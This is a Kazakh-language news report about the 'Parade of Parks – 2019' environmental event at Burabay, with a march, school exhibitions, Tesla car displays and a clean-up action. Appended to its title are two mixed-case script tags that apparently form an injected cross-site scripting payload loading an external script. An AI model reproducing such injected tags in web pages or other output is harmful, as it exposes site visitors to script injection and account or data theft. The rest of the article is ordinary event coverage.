«Парктер шеруі – 2019»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.06.2019

Ағымдағы жылдың 6 маусымы күні «Парктер шеруі – 2019» Халықаралық табиғаатты қорғау акциясы және Жасыл технология мен инвестициялық жобалардың халықаралық орталығымен бірлескен көрмесі өтті. Парктер шеруінің мақсаты – жұртшылықтың, мемлекеттік билік қызметкерлерінің, бұқаралық ақпарат құралдарының, кәсіпкерлердің  назарын ерекше қорғалатын табиғи аумақтардың мәселелеріне аудару.

Іс-шара бағдарламасында:

  • Бурабай поселкісінен «Орманшы саябағына» дейін Telsa автокөлігі мен

Ш.Уәлиханов атындағы кадет корпусының үрмелі оркестрінің еріп жүруімен қатысушылардың салтанатты маршы;

  • Мектептердің ғылыми жобаларының көрмесі;
  • Telsa автокөліктерінің көрмесі;
  • «Оқжетпес» шипажайына дейін автобуспен бару;
  • «Абылай хан» алаңына дейін жаяу бару;

Іс-шараның салтанатты бөлімінен кейін «Ғаламшарды ретке келтір» экологиялық акциясы ұйымдастырылды. Мереке соңында барлық қатысушы мектептерге алғыс хаттар мен естелік сыйлықтар табысталды.

Өткен іс-шара оқушыларға қатты ұнады, әсіресе мұражайға саяхат және автокөліктердің көрмесі.

Просмотров: 792


Пікір қосу



Деректерді қолтаңбаға қосу